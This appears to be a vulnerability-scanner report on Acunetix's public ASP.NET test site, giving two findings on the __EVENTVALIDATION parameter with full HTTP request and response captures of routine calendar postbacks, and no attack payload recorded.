URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1133 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,133 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8498&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgDASzLEN9sIZGRkqdOEAiI38Nir5y6lg%2BEPWBTcIMQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLm%2B4yiDgLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwf1Sam6ff8Ir5DK0ANhad%2BLWG6keg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:25:10 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgDASzLEN9sIZGRkqdOEAiI38Nir5y6lg+EPWBTcIMQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLm+4yiDgLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwf1Sam6ff8Ir5DK0ANhad+LWG6keg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:White" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8156&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgBABYkFK9oIZGRkx6FBoApeK9SFC2uxGRyg8GALsDA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLM%2Br7KDAK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPlhzBrtuFJnTQAggQPpOgYtLg9g4%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:58:17 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgBABYkFK9oIZGRkx6FBoApeK9SFC2uxGRyg8GALsDA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLM+r7KDAK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPlhzBrtuFJnTQAggQPpOgYtLg9g4=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:White" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who 